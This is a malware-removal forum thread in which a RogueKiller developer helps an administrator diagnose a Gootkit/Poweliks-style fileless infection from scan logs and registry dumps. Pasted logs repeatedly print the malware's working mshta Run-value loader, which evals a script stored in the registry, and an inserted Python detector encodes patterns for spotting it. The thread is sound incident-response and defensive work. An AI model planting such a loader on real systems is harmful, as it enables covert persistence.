Adlice forum
General Category => Malware removal help => Topic started by: Jojo51 on December 22, 2014, 12:47:54 PM
-
Hi,
We have used RogueKiller for years and have found it the best cleaning tool we can add to our antivirus solution. You are doing a great job and it is lucky to be able to use your software to solve some crisis situations.
Sadly, we are reporting a new rootkit that has infected several computers on our network. This virus infects principal Windows processes such as "explorer.exe", "svchost.exe" and others by injecting its code on the fly. RogueKiller reports the infection and can kill a few infected processes in memory, but cannot clean it. Each time we scan with RK, the threat is back in the same processes over and over.
In addition, the issue reported by our users is that they cannot work on their computers because the screen keeps flashing and showing a window that asks to install a trusted certificate. The screen flashes because when the virus starts its bad job, the antivirus (ESET Endpoint) kills the infected process without being able to clean the infection. It seems that the virus only works completely in the user profile used to install it; we log on to the local administrator session without getting this flashing error message. But even when we scan the system from this session, it reports some infected (injected) processes, though fewer.
You can find the RogueKiller's scan report and the screenshot of the error in this archive.
Hope you will provide a solution.
Best regards,
J. PEREIRA
-
Hello
Any chance to get a full explorer.exe dump? I'd like to extract the payload, that should help us to put a name on the infection.
EDIT: also, could you analyse that file on virus total? C:\Windows\cwbrxd.exe
-
Hi!
Thanks for the quick answer! :)
We have analysed the "cwbrxd.exe" file on VirusTotal but it doesn't report any infection. Through this link, you will find an archive with two "explorer.exe" dump files, because we found two of them in memory, but it is impossible to know which is the good one...
http://users.hexanet.fr/~pereira/explorer.zip
Thanks a lot for any help you can grant! :)
Best regards,
J. PEREIRA
-
Thanks, I'll take a look shortly.
-
VT came back clean https://www.virustotal.com/fr/file/6c1b0f6a4a765ebac4d742f1d62ceace2339941482a19f56b81b2841575d3cd6/analysis/1419261925/
I can see openssl related code in the dumped section, but no string that could help us.
Can you scan with Malwarebytes?
-
Yes, we already did the Anti-Malware and even the Anti-Rootkit scan, this afternoon for the third time. No infection reported by these tools. :(
By the way, our ESET antivirus now reports a threat in its log, speaking about a "Kryptic" virus variant. If it can help... ;)
-
Where is the threat reported?
Could be useful to scan with OTL: http://www.bleepingcomputer.com/download/otl/
-
Hi!
Still working hard on the subject without finding a solution. :(
We've done the scan with OTL as you asked in your last post, but it cannot clean anything either. :( You can find the log attached.
Thanks for your help! :)
J. PEREIRA
-
This is uncommon:
PRC - C:\Windows\SysWOW64\svchost.exe [comLaunch] (Microsoft Corporation)
PRC - C:\Windows\SysWOW64\rundll32.exe (Microsoft Corporation)
On x64, having system processes running as 32-bit can be suspicious.
And indeed:
O4 - HKU\.DEFAULT..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-18..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-19..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-20..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
O4 - HKU\S-1-5-21-1742386255-4278694884-558714565-500..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found
That looks like Poweliks.
Could you give me a dump (in raw hive format!) of the registry key:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
It's very important, please.
EDIT: the dump can be made with regedit, right click => export. Choose the raw (hive) format, not .reg
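As an added example (not code from this thread or from Adlice), a small Python checker that recognises the Run-value pattern quoted above in OTL-style "O4" log lines: it flags the fileless mshta/eval/RegRead construction, recovers the registry key the script reads its second stage from, and lists the hive-resolved locations a responder should review. The sample lines are constructed, and the function names are my own.

```python
import re

# Constructed sample lines in the OTL "O4" format quoted in this thread: one Gootkit-style mshta Run value, one ordinary autorun.
SAMPLE_LINES = [
    r"""O4 - HKU\S-1-5-18..\Run: [rundll32] mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" File not found""",
    r"""O4 - HKU\S-1-5-19..\Run: [OneDrive] "C:\Users\jojo\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background""",
]

RUN_LINE = re.compile(r"^O4 - (?P<hive>HKU\\[^\\]+)\.\.\\Run: \[(?P<name>[^\]]+)\] (?P<cmd>.*)$")
REGREAD = re.compile(r"RegRead\('([^']+)'\)")

def inspect_run_value(line):
    """Return a finding dict for a suspicious Run value, or None if the entry looks ordinary."""
    m = RUN_LINE.match(line)
    if not m:
        return None
    cmd = m.group("cmd")
    lowered = cmd.lower()
    reasons = []
    # mshta started on an inline "about:" document: the script lives in the Run value itself, no file on disk
    if lowered.startswith("mshta") and "about:" in lowered and "<script>" in lowered:
        reasons.append("inline HTA script in Run value")
    # eval() of data read back from the registry: the second stage is stored in a registry value
    if "eval(" in lowered and "regread(" in lowered:
        reasons.append("eval of registry-stored script")
    if not reasons:
        return None
    # undo the JavaScript string escaping ("\\" -> "\") to recover the real key path
    payload_keys = [k.replace("\\\\", "\\") for k in REGREAD.findall(cmd)]
    # a key whose name starts with a space (" xsw") is easy to miss in regedit and unusual for legitimate software
    if any(part.startswith(" ") for key in payload_keys for part in key.split("\\")):
        reasons.append("registry key name with leading space")
    return {"hive": m.group("hive"), "value": m.group("name"),
            "reasons": reasons, "payload_keys": payload_keys}

def cleanup_targets(finding):
    """Locations to review: the Run value itself and the payload key, with HKCU resolved to the HKEY_USERS hive."""
    hive = finding["hive"]
    targets = [hive + r"\Software\Microsoft\Windows\CurrentVersion\Run | " + finding["value"]]
    for key in finding["payload_keys"]:
        targets.append(hive + key[len("HKCU"):] if key.startswith("HKCU") else key)
    return targets

def scan(lines):
    """Run inspect_run_value over every log line and keep the findings."""
    return [f for f in (inspect_run_value(l) for l in lines) if f]
```

The same loader key shows up once per user hive in the logs quoted later in this thread, so the hive-resolved list is what tells you which NTUSER.DAT files still need attention.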
-
And also, please do the same for that key:
HKEY_CURRENT_USER\Software\ xsw\loader (mind the space)
-
Many thanks for your feedback, I will get the information you need and send it to you as quickly as possible! :)
-
By the way Malwarebytes should be able to remove it.
-
Hi!
First, I wish all the best to all the virus "Threat Fighters" for the new year 2015!! :)
Back to business...
Sorry for the delayed answer, I have investigated and spent a lot of time on this issue and discovered some useful information. So, thanks to your last message, I found the infection in the registry at different locations. The virus seems to install itself in each NTUSER.DAT file that constitutes the registry hive linked to each user. In each one, I find traces of it; here is what it is:
Found an "xsw" registry key in HKEY_CURRENT_USER\Software\ xsw\
Found a "cxsw" registry key in HKEY_CURRENT_LOCAL_MACHINE\Software\
Found multiple binaries in HKEY_CURRENT_USER\Software\ AppDataLow\
Found a value "Rundll32" in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Deleting the xsw registry key, the binaries in AppDataLow and the rundll32 value in the RUN key seems to be good, because the antivirus stops reporting the threat after the reboot. BUT the cxsw key still comes back after the first reboot and the virus seems to still be in the system; RogueKiller still reports the injected processes in explorer.exe and others.
So, that is what I can bring you as new information. At this address, http://users.hexanet.fr/~pereira/Virus.zip , you will find the dumps you asked for, in different formats to be sure you can exploit them. Anti-Malware doesn't solve anything; it even fails to report the infection... :(
Thanks again for your help, I hope that you will find the solution. :)
Best regards,
J. PEREIRA
-
Ok gotcha.
I would need to have a dump of explorer.exe also, can you download/start process hacker and make a full dump of it? Also, do you have several explorer.exe processes? The dump is quite big, but you should be able to share it with Google Drive/Dropbox.
That would help me to make a signature for the injected process.
Things that may work for the removal:
- Start Roguekiller, the prescan will kill the injected processes. Leave it without doing the scan (won't find anything anyway)
- With regedit, go to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run , and remove the rundll32 value.
- Reboot, let me know if the threat is gone.
-
Yes, here is the new "explorer.exe" dump created via Process Hacker: http://users.hexanet.fr/~pereira/explorer.exe.dmp
Already done this with RogueKiller, but the threat is still back after the reboot. The strangest thing is that on some computers the threat seems not to be completely installed, because I cannot find all the traces we spoke about in my last post. But the error message that shows the "certificate installation" is still present, and RogueKiller still finds injected processes in services.exe, lsass.exe, explorer.exe, etc... >:(
That's a big one! :(
-
Mmh, wide injection. I think the key is protected by all the injected processes.
The only way would be to remove the key "offline", like with an OTLPE CD: http://oldtimer.geekstogo.com/OTLPENet.exe
That's a CD ISO + burner software that you can boot from, and then it's a full Windows environment.
If you're an advanced user you'll find a regedit able to mount external hives; let me know if you think you're able to do it.
-
Looks like your malware is named "Gootkit": https://www.virustotal.com/fr/file/2a8eaa50b4c7c8b75f317fce2a3bc344109923ab65d91de6a6d571e829cbb68a/analysis/1420213053/
-
EP_X0FF has created a thread on kernel mode for that new infection, we're still analysing it, and searching its weaknesses.
http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669
-
It looks like a simple Run value removal is enough to remove the malware.
Can you please confirm once again?
-
Here's the infection log from the beta version of RogueKiller. I can put it online for testing if you need.
RogueKiller V10.1.1.0 [Dec 23 2014] par Adlice Software
email : http://www.adlice.com/contact/
Remontées : http://forum.adlice.com
Site web : http://www.adlice.com/fr/logiciels/roguekiller/
Blog : http://www.adlice.com
Système d'exploitation : Windows XP (5.1.2600 Service Pack 3) 32 bits version
Démarré en : Mode normal
Utilisateur : tigzy [Administrateur]
Mode : Scan -- Date : 01/03/2015 15:37:17
Commutateurs : -nokill
¤¤¤ Processus : 4 ¤¤¤
[Tr.Gootkit] explorer.exe -- C:\WINDOWS\Explorer.EXE[7] -> [NoKill]
[Tr.Gootkit] svchost.exe -- C:\WINDOWS\System32\svchost.exe[x] -> [NoKill]
[Tr.Gootkit] firefox.exe -- C:\Program Files\Mozilla Firefox\firefox.exe[7] -> [NoKill]
¤¤¤ Registre : 10 ¤¤¤
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\ xsw -> Trouvé(e)
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\ xsw -> Trouvé(e)
¤¤¤ Tâches : 0 ¤¤¤
¤¤¤ Fichiers : 0 ¤¤¤
¤¤¤ Fichier Hosts : 2 ¤¤¤
[C:\WINDOWS\System32\drivers\etc\hosts] 127.0.0.1 localhost
[C:\WINDOWS\System32\drivers\etc\hosts] ::1 localhost
¤¤¤ Antirootkit : 4 (Driver: Chargé) ¤¤¤
[IAT:Inl(Hook.IEAT)] (explorer.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x31939ba (jmp 0xffffffff8684f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - NtDeviceIoControlFile : Unknown @ 0x1ecfa65 (jmp 0xffffffff855b2852|jmp 0x39|call 0xffffffffffffff3e)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x1e839ba (jmp 0xffffffff8553f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) DNSAPI.dll - DnsQuery_W : Unknown @ 0x1ecf8d0 (jmp 0xffffffff8affcb3c)
¤¤¤ Navigateurs web : 0 ¤¤¤
¤¤¤ Vérification MBR : ¤¤¤
+++++ PhysicalDrive0: VBOX HARDDISK +++++
--- User ---
[MBR] c708b764ca9daa4f8f33e4e8b3b517da
[BSP] f4eb87199eee8a432bb482bb55118447 : Windows XP MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 63 | Size: 4086 MB
User = LL1 ... OK
User = LL2 ... OK
============================================
RKreport_SCN_01032015_152034.log
-
Hi!
Sounds good, it looks like you've done a great job! Thank you very much!!
Yes, if you can give me the new version I will test it on our infected computers. I will be your BETA tester!! :D
Speak soon,
Johnny
-
No, simply deleting the RUN value doesn't stop the infection. It seems that there is still something in it that makes explorer.exe crash in a loop.
-
You may want to try that version: http://download.adlice.com/RogueKiller_beta.exe
-
Thanks! I've just downloaded it.
Do I need to start it in safe mode or normally? Does it clean all the infected hives, or only the one of the user under which the program is started??
Sorry for the questions, but I want to be sure to use your tool with the best practice! ;)
Johnny
-
All the hives are cleaned.
Normal mode should be ok.
Should you need additional info: http://www.adlice.com/gootkitxswkit-removal-roguekiller/
-
Bad news :(
I have tested the BETA but it seems to fail to clean the infection. It can find it and starts the removal, but after the next reboot the threat is back. We can spot it when we restart RogueKiller. You will find attached the two scan reports, the first and the second after the cleaning/reboot.
Thanks for the help.
Johnny
-
Jojo51, any chance I could remote access one of the infected computers with TeamViewer?
I think that rootkit did download some friend to join the party, and maybe it's protecting it. That's unusual, but very possible.
I'll send you a PM to meet on Skype.
EDIT: The RUN key hasn't been found. Strange.
-
Yes, no problem! :) We can plan a TeamViewer session on an infected computer today at 03:00 pm (French time).
You can use my email (**********) to add me in Skype, I'm logged on at the moment.
Does it sound ok for you?
-
Will contact you on Skype.
(I'm removing your address to avoid spam)
-
For those who were following, it's probably the bootkit version of Gootkit.
So an MBR/VBR infection of the Rovnix type.